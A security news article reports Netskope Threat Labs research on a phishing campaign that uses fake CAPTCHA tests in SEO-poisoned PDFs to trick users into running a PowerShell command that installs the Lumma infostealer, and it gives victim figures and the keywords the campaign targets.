Infostealers are the new black as far as the malware of choice for pretty most all cybercriminals outside of the ransomware attack sphere. Although ransomware actors do steal data as an extortion leverage tool, the threat to passwords from massive and dedicated ongoing infostealer campaigns cannot be ignored. Now security researchers have observed a new threat campaign that has deployed as many as 5,000 fake CAPTCHA “I Am Not A Robot” tests that lead to installation of the most alarming of infostealers, the Lumma stealer malware. Here’s what you need to know and do.
Widespread Attack Uses Fake CAPTCHA Tests To Deploy Lumma Infostealer Threat
Researchers working at the Netskope Threat Labs have observed a widespread phishing campaign that employs the use of fake CAPTCHA images to target victims searching for PDF documents on major search engines. The methodology used includes getting users to complete the I Am Not A Robot tests in order to install the notoriously dangerous Lumma infostealer malware with an ultimate aim of obtaining passwords, credit card details and other personal information. “The attacker uses SEO to trick victims into visiting the pages by clicking on malicious search engine results,” Jan Michael Alcantara, a threat research engineer at Netskope Threat Labs, said, adding that some of these “contain fake CAPTCHAs that trick victims into executing malicious PowerShell commands, ultimately leading to the Lumma Stealer malware.”
At least 7,000 users have been affected so far, according to Alcantara, with most located in North America, Asia, and Southern Europe across technology, financial services and manufacturing sectors. “The PDF used to deliver Lumma Stealer contains images to download the document,” Alcantara continued, “which contains an embedded link that directs victims to a malicious website.” After clicking on the download image, the report explained, the victim will then be redirected to the site with the fake CAPTCHA test. If the victim follows the instructions, which are a red flag in and of themselves as they require them to paste clipboard content into a run window, a PowerShell command is executed that “downloads and executes the Lumma Stealer malware,” Alcantara said.
Infostealer Campaign Indicators Of Compromise
Be careful what you search for. That’s very good advice as far as this latest threat campaign is concerned. “Remarkably, nearly half of the 4,000 targeted keywords are related to user guides or manuals,” Alcantara warned, “while over a third are for templates and forms.” The words ”pdf,” ”free,” ”download” and ”printable” are among the most frequently repeated keywords used to distribute the malicious documents in these ongoing attacks.
Alcantara has confirmed that Netskope Threat Labs continues to hunt for campaigns that are employing these fake CAPTCHA images in PDF files, discovered using search engine results, and has so far found that “attackers have been distributing malicious PDFs across over 260 domains and targeting more than 4,000 keywords.” Knowing what PDF files are involved, and so avoiding the launch of those dangerous CAPTCHA tests in the first place, is critical. Thankfully, then, all of the indicators of compromise related to this latest infostealer campaign, including full details of the PDFs launching the fake CAPTCHA tests, can be found in the Netskop Threat Labs GitHub repository.
